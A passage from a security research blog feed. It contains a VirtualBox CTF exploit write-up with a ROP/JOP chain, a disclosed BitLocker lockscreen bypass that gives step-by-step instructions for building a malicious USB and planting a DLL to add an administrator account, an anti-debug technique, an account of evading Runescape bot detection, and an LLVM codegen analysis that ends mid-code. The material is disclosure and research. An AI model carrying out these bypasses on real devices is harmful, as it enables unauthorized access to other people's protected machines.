Our first issue is that we need to find some memory area where we can put the JOP data. Since our OOB write only allows us to write to the heap, that’ll have to do. But we can’t just go around writing stuff to the heap because that will most likely corrupt some heap metadata, or newly allocated objects will corrupt us. So we need to get a buffer allocated first and write to that. We can abuse the pszPatterns field in our spray for that. If we extend the pattern size to 0x70 bytes and place a known magic value in the first quad-word, we can use the OOB read to find that magic on the heap and overwrite the remaining 0x68 bytes with our payload. We’re the ones who allocated that string so it won’t get free’d randomly so long as we hold a reference to it and since we already leaked a heap address, we’re also able to calculate the address of our string and can use it in the JOP chain.

After spending ~30min straight reading through VBoxC.dll assembly together with localo, we finally came up with a way to get from r8 control to rsp control. I had trouble figuring out a way to describe the JOP chain, so css wizard localo created an interactive visualization in order to make following the chain easier. To simplify things even further, the visualization will show all registers with uncontrolled contents as XXX and any reading or uncontrolled writing operations to or from those registers will be ignored.

Let’s assume the JOP payload in our string is located at 0x1230 and r8 points to it. We trigger the callback, which will execute the jmp [r8+0x10]. You can click through the slides to understand what happens:

We managed to get rsp to point into our string and the next ret will kickstart ROP execution. From this point on, it’s just a matter of crafting a textbook WinExec("calc\x00") ROP-chain. But for the sake of completeness I’ll mention the gist of it. First, we read the address of a symbol from VBoxC.dll’s IAT. The IAT is comparable to a global offset table on linux and contains pointers to dynamically linked library symbols. We’ll use this to leak a pointer into kernel32.dll. Then we can calculate the runtime address of WinExec() in kernel32.dll, set rcx to point to "calc\x00" and call WinExec which will pop a calculator.

However there is a little twist to this. A keen eye might have noticed that we set rbp to 0x10000000 and that we are using a leave; jmp rax gadget to get to WinExec in rop_gadget_5 instead of just a simple jmp rax. That is because we were experiencing some major issues with stack alignment and stack frame size when directly calling WinExec with the stack pointer still pointing into our heap payload. It turns out, that WinExec sets up a rather large stack frame and the distance between out fake stack and the start of the heap isn’t always large enough to contain it. Therefore we were getting paging issues. Luckily, 0x4d5a and localo knew from reading this blog post about the vram section which has weak randomisation and it turns out that the range from 0xcb10000 to 0x13220000 is always mapped by that section. So if we set rbp to 0x10000000 and call a leave; jmp rax it will set the stack pointer to 0x10000000 before calling WinExec and thereby giving it enough space to do all the stack setup it likes ;)

Demo

‘nuff said! Here’s the demo:

You can find this version of our exploit here.

Credits

Writing this exploit was a joint effort of a bunch of people.

  • ESPR’s spq, tsuro and malle who don’t need an introduction :D

  • My ALLES! teammates and Windows experts Alain Rödel aka 0x4d5a and Felipe Custodio Romero aka localo

  • niklasb for his prior work and for some helpful pointers!

“A ROP chain a day keeps the doctor away. Immer dran denken, hat mein Opa immer gesagt.”

~ Niklas Baumstark (2021)

  • myself, Ilias Morad aka A2nkF :)

I had the pleasure of working with this group of talented people over the course of multiple sleepless nights and days during and even after the CTF was already over just to get the exploit working properly on a release build of VirtualBox and to improve stability. This truly shows what a small group of dedicated people is able to achieve in an incredibly short period of time if they put their minds to it! I’d like to thank every single one of you :D

Conclusion

This was my first time working with VirtualBox so it was a very educational and fun exercise. We managed to write a working exploit for a debug build of virtual box with 3h left in the CTF but sadly, we weren’t able to port it to a release build in time for the CTF due to anti-debugging in VirtualBox which made figuring out what exactly was breaking very hard. The next day we rebuilt VirtualBox without the anti-debugging/process hardening and finally properly ported the exploit to work with the latest release build of VirtualBox. We recommend you disable SCSI on your VirtualBox until this bug is patched.

The Organizers even agreed to demo our exploit in a live stream on their twitch channel afterwards and after some offset issues we finally got everything working!

I’d like to thank ChenNan again for creating the challenge and RealWorld CTF for being the excellent CTF we all grew to love. I’m looking forward to next years edition, where we hopefully will have an on-site finale in China again :).

This exploit was assigned CVE-2021-2119.

Part two…

This was the initial version of our exploit and it turned out to have a couple of issues which caused it to be a little fragile and somewhat unreliable. After the CTF was over we got together once more and attempted to identify and mitigate these weaknesses. localo will explain these issues and our workarounds in part two of this post (coming soon!).

Stay safe and happy pwning!

BitLocker Lockscreen bypass

By: Jonas L
15 January 2021 at 23:00

BitLocker is a modern data protection feature that is deeply integrated in the Windows kernel. It is used by many corporations as a means of protecting company secrets in case of theft. Microsoft recommends that you have a Trusted Platform Module which can do some of the heavy cryptographic lifting for you.

Bypassing BitLocker in 6 easy steps

Given a Windows 10 system without known passwords and a BitLocker-protected hard drive, an administrator account could be adding by doing the following:

  • At the sign-in screen, select “I have forgotten my password.”
  • Bypass the lock and enable autoplay of removable drives.
  • Insert a USB stick with my .exe and a junction folder.
  • Run executable.
  • Remove the thumb drive and put it back in again, go to the main screen.
  • From there launch narrator, that will execute a DLL payload planted earlier.

Now a user account is added called hax with password “hax” with membership in Administrators. To update the list with accounts to log into, click I forgot my password and then return to the main screen.

Bypassing the lock screen

First, we select the “I have forgotten my password/PIN” option. This option launches an additional session, with an account that gets created/deleted as needed; the user profile service calls it a default-account. It will have the first available name of defaultuser1, defaultuser100000, defaultuser100001, etc.

To escape the lock, we have to use the Narrator because if we manage to launch something, we cannot see it, but using the Narrator, we will be able to navigate it. However, how do we launch something?

If we smash shift 5 times in quick succession, a link to open the Settings app appears, and the link actually works. We cannot see the launched Settings app. Giving the launched app focus is slightly tricky; you have to click the link and then click a place where the launched app would be visible with the correct timing. The easiest way to learn to do it is, keep clicking the link roughly 2 times a second. The sticky keys windows will disappear. Keep clicking! You will now see a focus box is drawn in the middle of the screen. That was the Settings app, and you have to stop clicking when it gets focus.

Now we can navigate the Settings app using CapsLock + Left Arrow, press that until we reach Home. Now, when Home has focus, hold down Caps Lock and press Enter. Using CapsLock + Right Arrow navigate to Devices and CapsLock + Enter when it is in focus.

Now navigate to AutoPlay, CapsLock + Enter and choose “Open Folder to view files (File Explorer).” Now insert the prepared USB drive, wait some seconds, the Narrator will announce the drive has been opened, and the window is focused. Now select the file Exploit.exe and execute it with CapsLock + Enter. That is arbitrary code execution, ladies and gentlemen, without using any passwords. However, we are limited by running as the default profile.

I have made a video with my phone, as I cannot take screenshots.

Elevation of privilege

When a USB stick is mounted, BitLocker will create a directory named ClientRecoveryPasswordRotation in System Volume Information and set permissions to:

NT AUTHORITY\Authenticated Users:(F)
NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)

To redirect the create operation, a symbolic link in the NT namespace is needed as that allows us to control the filename, and the existence of the link does not abort the operation as it is still creating the directory.

Therefore, take a USB drive and make \System Volume Information a mount point targeting \RPC Control. Then make a symbolic link in \RPC Control\ClientRecoveryPasswordRotation targetting \??\C:\windows\system32\Narrator.exe.local. If the USB stick is reinserted then the folder C:\windows\system32\Narrator.exe.local will be created with permissions that allows us to create a subdirectory:

amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.18362.657_none_e6c5b579130e3898

Inside this subdirectory, we drop a payload DLL named comctl32.dll. Next time the Narrator is triggered, it will load the DLL. By the way, I chose the Narrator as that is triggerable from the login screen as a system service and is not auto-loaded, so if anything goes wrong, we can still boot.

Combining them

The ClientRecoveryPasswordRotation exploit to work requires a symbolic link in \RPC Control. The executable on the USB drive creates the link using two calls to DefineDosDevice, making the link permanent so they can survive a logout/in if needed.

Then a loop is started in which the executable will:

  • Try to create the subdirectory.
  • Plant the payload comctl32.dll inside it.

It is easy to see when the loop is running because the Narrator will move its focus box and say “access denied” every second. We can now use the link created in RPC Control. Unplug the USB stick and reinsert it. The writeable directory will be created in System32; on the next loop iteration, the payload will get planted, and exploit.exe will exit. To test if the exploit has been successful, close the Narrator and try to start it again.

If the narrator does not work, it is because the DLL is planted, and Narrator executes it, but it fails to add an account because it is launched as defaultuser1. When the payload is planted, you will need to click back to the login screen and start Narrator; 3 beeps should play, and a message box saying the DLL has been loaded as SYSTEM should show. Great! The account has been created, but it is not in the list. Press “I forgot my password” and click back to update the list.

A new account named hax should appear, with password hax.

Making a malicious USB

I used these steps to arm the USB device

C:\Users\jonas>format D: /fs:ntfs /q
Insert new disk for drive D:
Press ENTER when ready...
-----
File System: NTFS.
Quick Formatting 30.0 GB
Volume label (32 characters, ENTER for none)?
Creating file system structures.
Format complete.
30.0 GB total disk space.
30.0 GB are available.

Now, we need to elevate to admin to delete System Volume Information.

C:\Users\jonas>d:
D:\>takeown /F "System Volume Information"

This results in

SUCCESS: The file (or folder): "D:\System Volume Information" now owned by user "DESKTOP-LTJEFST\jonas".

We can then

D:\>icacls "System Volume Information" /grant Everyone:(F)
Processed file: System Volume Information
Successfully processed 1 files; Failed processing 0 files
D:\>rmdir /s /q "System Volume Information"

We will use James Forshaw’s tool (attached) to create the mount point.

D:\>createmountpoint "System Volume Information" "\RPC Control"

Then copy the attached exploit.exe to it.

D:\>copy c:\Users\jonas\source\repos\exploitKit\x64\Release\exploit.exe .
1 file(s) copied.

Patch

I disclosed this vulnerability and it was assigned CVE-2020-1398. Its patch can be found here

Process on a diet: anti-debug using job objects

By: jm
20 January 2021 at 23:00

In the second iteration of our anti-debug series for the new year, we will be taking a look at one of my favorite anti-debug techniques. In short, by setting a limit for process memory usage that is less or equal to current memory usage, we can prevent the creation of threads and modification of executable memory.

Job Object Basics

While job objects may seem like an obscure feature, the browser you are reading this article on is most likely using them (if you are a Windows user, of course). They have a ton of capabilities, including but not limited to:

  • Disabling access to user32 functionality.
  • Limiting resource usage like IO or network bandwidth and rate, memory commit and working set, and user-mode execution time.
  • Assigning a memory partition to all processes in the job.
  • Offering some isolation from the system by “upgrading” the job into a silo.

As far as API goes, it is pretty simple - creation does not really stand out from other object creation. The only other APIs you will really touch is NtAssignProcessToJobObject whose name is self-explanatory, and NtSetInformationJobObject through which you will set all the properties and capabilities.

NTSTATUS NtCreateJobObject(HANDLE*            JobHandle,
                           ACCESS_MASK        DesiredAccess,
                           OBJECT_ATTRIBUTES* ObjectAttributes);

NTSTATUS NtAssignProcessToJobObject(HANDLE JobHandle, HANDLE ProcessHandle);

NTSTATUS NtSetInformationJobObject(HANDLE JobHandle, JOBOBJECTINFOCLASS InfoClass,
                                   void*  Info,      ULONG              InfoLen);

The Method

With the introduction over, all one needs to create a job object, assign it to a process, and set the memory limit to something that will deny any attempt to allocate memory.

HANDLE job = nullptr;
NtCreateJobObject(&job, MAXIMUM_ALLOWED, nullptr);

NtAssignProcessToJobObject(job, NtCurrentProcess());

JOBOBJECT_EXTENDED_LIMIT_INFORMATION limits;
limits.ProcessMemoryLimit               = 0x1000;
limits.BasicLimitInformation.LimitFlags = JOB_OBJECT_LIMIT_PROCESS_MEMORY;
NtSetInformationJobObject(job, JobObjectExtendedLimitInformation,
                          &limits, sizeof(limits));

That is it. Now while it is sufficient to use only syscalls and write code where you can count the number of dynamic allocations on your fingers, you might need to look into some of the affected functions to make a more realistic program compatible with this technique, so there is more work to be done in that regard.

The implications

So what does it do to debuggers and alike?

  • Visual Studio - unable to attach.
  • WinDbg
    • Waits 30 seconds before attaching.
    • cannot set breakpoints.
  • x64dbg
    • will not be able to attach (a few months old).
    • will terminate the process of placing a breakpoint (a week or so old).
    • will fail to place a breakpoint.

Please do note that the breakpoint protection only works for pages that are not considered private. So if you compile a small test program whose total size is less than a page and have entry breakpoints or count it into the private commit before reaching anti-debug code - it will have no effect.

Conclusion

Although this method requires you to be careful with your code, I personally love it due to its simplicity and power. If you cannot see yourself using this, do not worry! You can expect the upcoming article to contain something that does not require any changes to your code.

BitLocker touch-device lockscreen bypass

29 January 2021 at 23:00

Microsoft has for the past years done a great job at hardening the Windows lockscreen, but after Jonas published CVE-2020-1398, I put effort into weaponizing an old bug I had found in Windows Touch devices.

These exploits rely on the fundamental design of the Windows Lockscreen, where the instance that prompts the user for password runs with SYSTEM privileges. This means that even though most of the UI is blocked, you can always find a way to do some damage when there are options like “Reset password”

Clicking this button will result in a new user being created with the name of defaultuser1, defaultuser100000, defaultuser100001 (et cetera), and a new instance of WWAHost asking for user account credentials will be spawned. If everything is in order, it will ask you for a new pin, otherwise you will be stuck in this instance.

Bypassing BitLocker in 5 easy steps

  • Connect a physical keyboard
  • Enable the narrator
  • Select “I have forgotten my password.” and “Text <phonenumber>”
  • Change the size of the on-screen keyboard and open keyboard settings
  • Interact with the hidden settings window to execute our payload

Constraints

To exploit this vulnerability, you will need:

  1. A surface touchscreen device. I used a surface book 2 15’ (Running up-to-date Windows 10 20H2 with BitLocker enabled)
  2. A external keyboard
  3. A flash drive containing your payload.

Keyboard confusion

By connecting a external keyboard to our Surface device, we have the capability using both the on-screen and the physical keyboard. This is necessary to abuse certain functionality that allows us to bypass the lockscreen.

Narration

Windows includes various accessibility features such as narration. This functionality allows us to operate on hidden UI elements, as the narrator will read any selected element out loud, visible or not. Turn it on by clicking Windows+U and selecting “Enable narrator”

I forgot my password

A Forgotten password is one of the few cases you would ever do anything but login on the Windows lockscreen. The first part of our bypass requires you to select “I have forgotten my password.” on the login screen. This will open up a Microsoft Account login form, where you can choose to recover your password by texting a certain phone number. Selecting this opens up a text bar where you would normally type in the full recovery phone number, but in our case that is not the point. By opening this text bar, we can make the touch device display an on screen keyboard, which was the goal all along. With this software keyboard, you can change the size of the keyboard by hitting the options button in the top left, choose the largest keyboard available.

Now you should have a large software keyboard where you can open the settings menu:

After initialising the launch of keyboard settings, there is a small time frame where you can double click on this grey area here:

If you did this successfully, the narrator should explicitly say “Settings window”

Navigating settings

You wouldn’t think you could much with a hidden settings window on a locked Windows device, but you can actually navigate said window with a external keyboard. While holding down the Caps Lock key, the arrow keys and the tab key can be used to navigate UI elements.

One weaponization of this is going to Autoplay -> Removable drives -> Open folder to view files. This launches File Explorer, where you can execute windows binaries from a usb thumb-drive.

Disclosure

I reported the issue to MSRC, but they ignored the bug report citing a need of PoC, which I had already provided, they had also expressed disbelief towards the exploitability of this bug.

Demonstration

How Runescape catches botters, and why they didn’t catch me

By: vmcall
3 April 2021 at 23:00

Player automation has always been a big concern in MMORPGs such as World of Warcraft and Runescape, and this kind of game-hacking is very different from traditional cheats in for example shooter games.

One weekend, I decided to take a look at the detection systems put in place by Jagex to prevent player automation in Runescape.

Botting

For the past months, an account named sch0u has been playing on world 67 around the clock doing mundane tasks such as killing mobs or harvesting resources. At first glance, this account looks just like any other player, but there is one key difference: it’s a bot.

I started this bot back in October with the goal of testing the limits of their bot detection system. I tried to find information online on how Jagex combats these botters, and only found videos of commercial bots bragging about how their mouse movement systems are indistinguishable from humans.

Therefore, the only thing I could deduce was that mouse movement matters, or does it?

Heuristics!

I started by analyzing the Runescape client to confirm this theory, and quickly noticed a global called hhk set shortly launch.

const auto module_handle = GetModuleHandleA(0);
hhk = SetWindowsHookExA(WH_MOUSE_LL, rs::mouse_hook_handler, module_handle, 0);

This installs a low level hook on the mouse by appending to the system-wide hook chain. This allows applications on Windows to intercept all mouse events, whether or not the events are related to your application. Low level hooks are frequently used by keyloggers, but have legitimate use cases such as heuristics like the aforementioned mouse hook.

The Runescape mouse handler is quite simple in its essence (the following pseudocode has been beautified by hand):

LRESULT __fastcall rs::mouse_hook_handler(int code, WPARAM wParam, LPARAM lParam)
{
  if ( rs::client::singleton )
  {
      // Call the internal logging handler
      rs::mouse_hook_handler_internal(rs::client::singleton->window_ctx, wParam, lParam);
  }
  // Pass the information to the next hook on the system
  return CallNextHookEx(hhk, code, wParam, lParam);
}
void __fastcall rs::mouse_hook_handler_internal(rs::window_ctx *window_ctx, __int64 wparam, _DWORD *lparam)
{
  // If the mouse event happens outside of the Runescape window, don't log it.
  if (!window_ctx->event_inside_of_window(lparam))
  {
    return;
  }

  switch (wparam)
  {
    case WM_MOUSEMOVE:
      rs::heuristics::log_movement(lparam);
      break;
    
    case WM_LBUTTONDOWN:
    case WM_LBUTTONDBLCLK:
    case WM_RBUTTONDOWN:
    case WM_RBUTTONDBLCLK:
    case WM_MBUTTONDOWN:
    case WM_MBUTTONDBLCLK:
      rs::heuristics::log_button(lparam);
      break;
  }
}

for bandwidth reasons, these rs::heuristics::log_* functions use simple algorithms to skip event data that resembles previous logged events.

This event data is later parsed by the function rs::heuristics::process, which is called every frame by the main render loop.


void __fastcall rs::heuristics::process(rs::heuristic_engine *heuristic_engine)
{
  // Don't process any data if the player is not in a world
  auto client = heuristic_engine->client;
  if (client->state != STATE_IN_GAME)
  {
    return;
  }

  // Make sure the connection object is properly initialised
  auto connection = client->network->connection;
  if (!connection || connection->server->mode != SERVER_INITIALISED)
  {
    return;
  }

  // The following functions parse and pack the event data, and is later sent
  // by a different component related to networking that has a queue system for
  // packets.

  // Process data gathered by internal handlers
  rs::heuristics::process_source(&heuristic_engine->event_client_source);

  // Process data gathered by the low level mouse hook
  rs::heuristics::process_source(&heuristic_engine->event_hook_source);
}

Away from keyboard?

While reversing, I put effort into knowing the relevance of the function I am looking at, primarily by hooking or patching the function in question. You can usually deduce the relevance of a function by rendering it useless and observing the state of the software, and this methodology lead to an interesting observation.

By preventing the game from calling the function rs::heuristics::process, I didn’t immediately notice anything, but after exactly five minutes, I was logged out of the game. Apparently, Runescape decides if a player is inactive by solely looking at the heuristic data sent to the server by the client, even though you can play the game just fine. This raised a new question: If the server doesn’t think I am playing, does it think I am botting?.

This lead to spending a few days reverse engineering the networking layer of the game, which resulted in my ability to bot almost anything using only network packets.

To prove my theory, I botted twenty four hours a day, seven days a week, without ever moving my mouse. After doing this for thousands of hours, I can safely state that their bot detection either relies on the heuristic event data sent by the client, or is only run when the player is not “afk”. Any player that manages to play without moving their mouse should be banned immediately, thus making this oversight worth revisiting.

A look at LLVM - comparing clamp implementations

By: duk
9 April 2021 at 00:00

Please note that this is not an endorsement or criticism of either of these languages. It’s simply something I found interesting with how LLVM handles code generation between the two. This is an implementation quirk, not a language issue.

Update (April 9, 2021): A bug report was filed and a fix was pushed!

The LLVM project is a modular set of tools that make designing and implementing a compiler significantly easier. The most well known part of LLVM is their intermediate representation; IR for short. LLVM’s IR is an extremely powerful tool, designed to make optimization and targeting many architectures as easy as possible. Many tools use LLVM IR; the Clang C++ compiler and the Rust compiler (rustc) are both notable examples. However, despite this unified architecture, code generation can still vary wildly between implementations and how the IR is used. Some time ago, I stumbled upon this tweet discussing Rust’s implementation of clamping compared to C++:

Rust 1.50 is out and has f32.clamp. I had extremely low expectations for performance based on C++ experience but as usual Rust proves to be "C++ done right".

Of course Zig already has clamp and also gets codegen right. pic.twitter.com/0WI1fLrQaB

— Arseny Kapoulkine (@zeuxcg) February 11, 2021

Rust’s code generation on the latest version of LLVM is far superior compared to an equivalent Clang version using std::clamp, even though they use the same underlying IR:

With f32.clamp:

pub fn clamp(v: f32) -> f32 {
    v.clamp(-1.0, 1.0)
}

The corresponding assembly is shown below. It is short, concise, and pretty much the best you’re going to get. We can see two memory accesses to get the clamp bounds and efficient use of x86 instructions.

.LCPI0_0:
        .long   0xbf800000
.LCPI0_1:
        .long   0x3f800000
example::clamp:
        movss   xmm1, dword ptr [rip + .LCPI0_0]
        maxss   xmm1, xmm0
        movss   xmm0, dword ptr [rip + .LCPI0_1]
        minss   xmm0, xmm1
        ret

Next is a short C++ program using std::clamp:

#include <algorithm>
float clamp2(float v) {
    return std::clamp(v, -1.f, 1.f);
}

The corresponding assembly is shown below. It is significantly longer with many more data accesses, conditional moves, and is in general uglier.

.LCPI1_0:
        .long   0x3f800000                         float 1
.LCPI1_1:
        .long   0xbf800000                         float -1
clamp2(float):                                     @clamp2(float)
        movss   dword ptr [rsp - 4], xmm0
        mov     dword ptr [rsp - 8], -1082130432  
        mov     dword ptr [rsp - 12], 1065353216  
        ucomiss xmm0, dword ptr [rip + .LCPI1_0]  
        lea     rax, [rsp - 12]
        lea     rcx, [rsp - 4]
        cmova   rcx, rax
        movss   xmm1, dword ptr [rip + .LCPI1_1]  # xmm1 = mem[0],zero,zero,zero
        ucomiss xmm1, xmm0
        lea     rax, [rsp - 8]
        cmovbe  rax, rcx
        movss   xmm0, dword ptr [rax]             # xmm0 = mem[0],zero,zero,zero
        ret

Interestingly enough, reimplementing std::clamp causes this issue to disappear:

float clamp(float v, float lo, float hi) {
    v = (v < lo) ? lo : v;
    v = (v > hi) ? hi : v;
    return v;
}

float clamp1(float v) {
    return clamp(v, -1.f, 1.f);
}

The assembly generated here is the same as with Rust’s implementation:

.LCPI0_0:
        .long   0xbf800000                        # float -1
.LCPI0_1:  
        .long   0x3f800000                        # float 1
clamp1(float):                                    # @clamp1(float)
        movss   xmm1, dword ptr [rip + .LCPI0_0]  # xmm1 = mem[0],zero,zero,zero
        maxss   xmm1, xmm0 
        movss   xmm0, dword ptr [rip + .LCPI0_1]  # xmm0 = mem[0],zero,zero,zero
        minss   xmm0, xmm1
        ret

Clearly, something is off between std::clamp and our implementation. According to the C++ reference, std::clamp takes two references along with a predicate (which defaults to std::less) and returns a reference. Functionally, the only difference between our code and std::clamp is that we do not use reference types. Knowing this, we can then reproduce the issue.

const float& bad_clamp(const float& v, const float& lo, const float& hi) {
    return (v < lo) ? lo : (v > hi) ? hi : v;
}

float clamp2(float v) {
    return bad_clamp(v, -1.f, 1.f);
}

Once again, we’ve generated the same bad code as with std::clamp:

.LCPI1_0:
        .long   0x3f800000                        # float 1
.LCPI1_1: 
        .long   0xbf800000                        # float -1
clamp2(float):                                    # @clamp2(float)
        movss   dword ptr [rsp - 4], xmm0 
        mov     dword ptr [rsp - 8], -1082130432 
        mov     dword ptr [rsp - 12], 1065353216 
        ucomiss xmm0, dword ptr [rip + .LCPI1_0] 
        lea     rax, [rsp - 12] 
        lea     rcx, [rsp - 4] 
        cmova   rcx, rax 
        movss   xmm1, dword ptr [rip + .LCPI1_1]  # xmm1 = mem[0],zero,zero,zero
        ucomiss xmm1, xmm0 
        lea     rax, [rsp - 8] 
        cmovbe  rax, rcx 
        movss   xmm0, dword ptr [rax]             # xmm0 = mem[0],zero,zero,zero
        ret

LLVM IR and Clang

LLVM IR is a Static Single Assignment (SSA) intermediate representation. What this means is that every variable is only assigned to once. In order to represent conditional assignments, SSA form uses a special type of instruction called a “phi” node, which picks a value based on the block that was previously running. However, Clang does not initially use phi nodes. Instead, to make initial code generation easier, variables in functions are allocated on the stack using alloca instructions. Reads and assignments to the variable are load and store instructions to the alloca, respectively:

int main() {
    float x = 0;
}

In this unoptimized IR, we can see an alloca instruction that then has the float value 0 stored to it:

define dso_local i32 @main() #0 {
  %1 = alloca float, align 4
  store float 0.000000e+00, float* %1, align 4
  ret i32 0
}

LLVM will then (hopefully) optimize away the alloca instructions with a relevant pass, like SROA.

LLVM IR and reference types

Reference types are represented as pointers in LLVM IR:

void test(float& x2) {
    x2 = 1;
}

In this optimized IR, we can see that the reference has been converted to a pointer with specific attributes.

define dso_local void @_Z4testRf(float* nocapture nonnull align 4 dereferenceable(4) %0) local_unnamed_addr #0 {
  store float 1.000000e+00, float* %0, align 4, !tbaa !2
  ret void
}

When a function is given a reference type as an argument, it is passed the underlying object’s address instead of the object itself. Also passed is some metadata about reference types. For example, nonnull and dereferenceable are set as attributes to the argument because the C++ standard dictates that references always have to be bound to a valid object. For us, this means the alloca instructions are passed directly to the clamp function:

__attribute__((noinline)) const float& bad_clamp(const float& v, const float& lo, const float& hi) {
    return (v < lo) ? lo : (v > hi) ? hi : v;
}

float clamp2(float v) {
    return bad_clamp(v, -1.f, 1.f);
}

In this optimized IR, we can see alloca instructions passed to bad_clamp corresponding to the variables passed as references.

define linkonce_odr dso_local nonnull align 4 dereferenceable(4) float* @_Z9bad_clampRKfS0_S0_(float* nonnull align 4 dereferenceable(4) %0, float* nonnull align 4 dereferenceable(4) %1, float* nonnull align 4 dereferenceable(4) %2) local_unnamed_addr #2 comdat {
  %4 = load float, float* %0, align 4
  %5 = load float, float* %1, align 4
  %6 = fcmp olt float %4, %5
  %7 = load float, float* %2, align 4
  %8 = fcmp ogt float %4, %7
  %9 = select i1 %8, float* %2, float* %0
  %10 = select i1 %6, float* %1, float* %9
  ret float* %10
}

define dso_local float @_Z6clamp2f(float %0) local_unnamed_addr #1 {
  %2 = alloca float, align 4
  %3 = alloca float, align 4
  %4 = alloca float, align 4
  store float %0, float* %2, align 4
  store float -1.000000e+00, float* %3, align 4
  store float 1.000000e+00, float* %4, align 4                                                                                                                                         
  %6 = call nonnull align 4 dereferenceable(4) float* @_Z9bad_clampRKfS0_S0_(float* nonnull align 4 dereferenceable(4) %2, float* nonnull align 4 dereferenceable(4) %3, float* nonnull align 4 dereferenceable(4) %4)
  %7 = load float, float* %7, align 4
  ret float %7
}

Lifetime annotations are omitted to make the IR a bit clearer.

In this example, the noinline attribute was used to demonstrate passing references to functions. If we remove the attribute, the call is inlined into the function:

const float& bad_clamp(const float& v, const float& lo, const float& hi) {
    return (v < lo) ? lo : (v > hi) ? hi : v;
}
float clamp2(float v) {
    return bad_clamp(v, -1.f, 1.f);
}

However, even after optimization, the alloca instructions are still there for seemingly no good reason. These alloca instructions should have been optimized away by LLVM’s passes; they’re not used anywhere else and there are no tricky stores or lifetime problems.

define dso_local float @_Z6clamp2f(float %0) local_unnamed_addr #0 {
  %2 = alloca float, align 4
  %3 = alloca float, align 4
  %4 = alloca float, align 4
  store float %0, float* %2, align 4, !tbaa !2
  store float -1.000000e+00, float* %3, align 4, !tbaa !2
  store float 1.000000e+00, float* %4, align 4, !tbaa !2
  %5 = fcmp olt float %0, -1.000000e+00
  %6 = fcmp ogt float %0, 1.000000e+00
  %7 = select i1 %8, float* %4, float* %2
  %9 = select i1 %7, float* %3, float* %9
  %9 = load float, float* %10, align 4, !tbaa !2
  ret float %9
}

The only candidate here is the two sequential select instructions, as they operate on the pointers created by the alloca instructions instead of the underlying value. However, LLVM also has a pass for this; if possible, LLVM will try to “speculate” across select instructions that load their results.

select instructions are essentially ternary operators that pick one of the last two operands (float pointers in our case) based on the value of the first operand.

Select speculation - where things go wrong

A few calls down the chain, this function calls isDereferenceableAndAlignedPointer, which is what determines whether a pointer can be dereferenced. The code here exposes the main issue: the select instruction is never considered ‘dereferenceable’. As such, when there are two selects in sequence (as seen with our std::clamp), it will not try to speculate the select instruction and will not remove the alloca.

Fix 1: libcxx

A potential fix is modifying the original code to not produce select instructions in the same way. For example, we can mimic our original implementation with pointers instead of value types. Though the IR output change is relatively small, this gives us the code generation we want without modifying the LLVM codebase:

const float& better_ref_clamp(const float& v, const float& lo, const float& hi) {
    const float *out;
    out = (v < lo) ? &lo : &v;
    out = (*out > hi) ? &hi : out;
    return *out;
}

float clamp3(float v) {
    return better_ref_clamp(v, -1.f, 1.f);
}

As you can see, the IR generated after the call is inlined is significantly shorter and more efficient than before:

define dso_local float @_Z6clamp3f(float %0) local_unnamed_addr #1 {
  %2 = fcmp olt float %0, -1.000000e+00
  %3 = select i1 %2, float -1.000000e+00, float %0
  %4 = fcmp ogt float %3, 1.000000e+00
  %5 = select i1 %4, float 1.000000e+00, float %3
  ret float %5
}

And the corresponding assembly is back to what we want it to be:

.LCPI1_0:
        .long   0xbf800000                        # float -1
.LCPI1_1:
        .long   0x3f800000                        # float 1
clamp3(float):                                    # @clamp3(float)
        movss   xmm1, dword ptr [rip + .LCPI1_0]  # xmm1 = mem[0],zero,zero,zero
        maxss   xmm1, xmm0
        movss   xmm0, dword ptr [rip + .LCPI1_1]  # xmm0 = mem[0],zero,zero,zero
        minss   xmm0, xmm1
        ret

Fix 2: LLVM

A much more general approach is fixing the code generation issue in LLVM itself, which could be as simple as this:

diff --git a/llvm/lib/Analysis/Loads.cpp b/llvm/lib/Analysis/Loads.cpp
index d8f954f575838d9886fce0df2d40407b194e7580..affb55c7867f48866045534d383b4d7ba19773a3 100644
--- a/llvm/lib/Analysis/Loads.cpp
+++ b/llvm/lib/Analysis/Loads.cpp
@@ -103,6 +103,14 @@ static bool isDereferenceableAndAlignedPointer(
         CtxI, DT, TLI, Visited, MaxDepth);
   }
 
+  // For select instructions, both operands need to be dereferenceable.
+  if (const SelectInst *SelInst = dyn_cast<SelectInst>(V))
+    return isDereferenceableAndAlignedPointer(SelInst->getOperand(1), Alignment,
+                                              Size, DL, CtxI, DT, TLI,
+                                              Visited, MaxDepth) &&
+           isDereferenceableAndAlignedPointer(SelInst->getOperand(2), Alignment,
+                                              Size, DL, CtxI, DT, TLI,
+                                              Visited, MaxDepth);
   // For gc.relocate, look through relocations
   if (const GCRelocateInst *RelocateInst = dyn_cast<GCRelocateInst>(V))
     return isDereferenceableAndAlignedPointer(RelocateInst->getDerivedPtr(),

All it does is add select instructions to the list of instruction types to consider potentially dereferenceable. Though it seems to fix the issue (and alive2 seems to like it), this is otherwise untested. Also, the codegen still isn’t perfect. Though the redundant memory accesses are removed, there are still many more instructions than in our libcxx fix (and Rust’s implementation):

.LCPI0_0:
        .long   0x3f800000                        # float 1
.LCPI0_1: 
        .long   0xbf800000                        # float -1
clamp2(float):                                    # @clamp2(float)
        movss   xmm1, dword ptr [rip + .LCPI0_0]  # xmm1 = mem[0],zero,zero,zero
        minss   xmm1, xmm0 
        movss   xmm2, dword ptr [rip + .LCPI0_1]  # xmm2 = mem[0],zero,zero,zero
        cmpltss xmm0, xmm2
        movaps  xmm3, xmm0
        andnps  xmm3, xmm1
        andps   xmm0, xmm2
        orps    xmm0, xmm3
        ret

However, this is because of the ternary operators done in the original libcxx clamp:

template<class _Tp, class _Compare>
const _Tp& clamp(const _Tp& __v, const _Tp& __lo, const _Tp& __hi, _Compare __comp)
{
    _LIBCPP_ASSERT(!__comp(__hi, __lo), "Bad bounds passed to std::clamp");
    return __comp(__v, __lo) ? __lo : __comp(__hi, __v) ? __hi : __v;

}

The reason this doesn’t look as good is because LLVM needs to store the original value of __v for the second comparison. Due to this, it then can’t optimize the second part of this computation into a maxss as that would produce different behavior when __lo is greater than __hi and __v is negative.

const float& ref_clamp(const float& v, const float& lo, const float& hi) {
    return (v < lo) ? lo : (v > hi) ? hi : v;
}

const float& better_ref_clamp(const float& v, const float& lo, const float& hi) {
    const float *out;
    out = (v < lo) ? &lo : &v;
    out = (*out > hi) ? &hi : out;
    return *out;
}

int main() {
    printf("%f\n", ref_clamp(-2.f, 1.f, -1.f));        // this prints 1.000
